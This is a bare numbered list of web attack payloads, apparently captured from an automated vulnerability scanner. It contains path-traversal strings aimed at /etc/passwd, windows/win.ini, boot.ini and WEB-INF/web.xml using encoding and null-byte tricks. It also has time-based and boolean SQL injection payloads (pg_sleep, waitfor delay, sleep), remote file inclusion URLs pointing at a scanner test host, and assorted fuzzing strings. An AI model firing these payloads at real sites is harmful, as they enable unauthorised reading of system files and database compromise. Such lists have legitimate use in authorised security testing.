1. |
WEB-INF\web.xml |
2. |
WEB-INF/web.xml |
3. |
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. |
4. |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini |
5. |
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini |
6. |
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini |
7. |
..\..\..\..\..\..\..\..\windows\win.ini |
8. |
................windowswin.ini |
9. |
|
10. |
../../../../../../../../../../windows/win.ini .jpg |
11. |
../../../../../../../../../../boot.ini |
12. |
../../../../../../../../../../windows/win.ini |
13. |
WEB-INF\web.xml |
14. |
/WEB-INF/web.xml |
15. |
WEB-INF/web.xml |
16. |
/\../\../\../\../\../\../\../etc/passwd |
17. |
file:///etc/passwd |
18. |
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. |
19. |
.. |
20. |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd |
21. |
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd |
22. |
/.././.././.././.././.././.././.././../etc/./passwd%00 |
23. |
%2fetc%2fpasswd |
24. |
/etc/passwd |
25. |
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd |
26. |
/../..//../..//../..//../..//../..//etc/passwd .jpg |
27. |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg |
28. |
../../../../../../../../../../etc/passwd .jpg |
29. |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg |
30. |
../../../../../../../../../../../../../../../proc/version |
31. |
../../../../../../../../../../etc/passwd |
32. |
ELA2hKaZ'));select pg_sleep(21); -- |
33. |
zjPZfCDt');select pg_sleep(14); -- |
34. |
tf6N4gry';select pg_sleep(14); -- |
35. |
-1));select pg_sleep(14); -- |
36. |
-1);select pg_sleep(14); -- |
37. |
-1;select pg_sleep(14); -- |
38. |
9PLg25xc'; waitfor delay '0:0:7' -- |
39. |
1 waitfor delay '0:0:7' -- |
40. |
-1); waitfor delay '0:0:7' -- |
41. |
-1; waitfor delay '0:0:21' -- |
42. |
(select(0)from(select(sleep(21)))v)/*'+(select(0)from(select(sleep(21)))v)+'"+(select(0)from(select(sleep(21)))v)+"*/ |
43. |
if(now()=sysdate(),sleep(21),0)/*'XOR(if(now()=sysdate(),sleep(21),0))OR'"XOR(if(now()=sysdate(),sleep(21),0))OR"*/ |
44. |
-1" OR 2+847-847-1=0+0+0+1 -- |
45. |
-1' OR 2+470-470-1=0+0+0+1 or 'BrNbCiq1'=' |
46. |
-1' OR 2+252-252-1=0+0+0+1 -- |
47. |
-1 OR 2+934-934-1=0+0+0+1 |
48. |
-1 OR 2+295-295-1=0+0+0+1 -- |
49. |
kCIpDl9P |
50. |
1 |
51. |
1 |
52. |
(select convert(int,CHAR(65))) |
53. |
|
54. |
|
55. |
JyI= |
56. |
@@ZVfxZ |
57. |
1 |
58. |
\ |
59. |
1'" |
60. |
1 |
61. |
1 |
62. |
testasp.vulnweb.com |
63. |
http://testasp.vulnweb.com/t/fit.txt?.jpg |
64. |
Http://testasp.vulnweb.com/t/fit.txt |
65. |
1 |
66. |
1some_inexistent_file_with_long_name .jpg |
67. |
1 |
68. |
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg |
69. |
1 |
70. |
1 |
71. |
1 |
72. |
^(#$!@#$)(()))****** |
73. |
!(()&&!|*|*| |
74. |
) |
75. |
Array |
76. |
12345'"\'\");|]* {
< |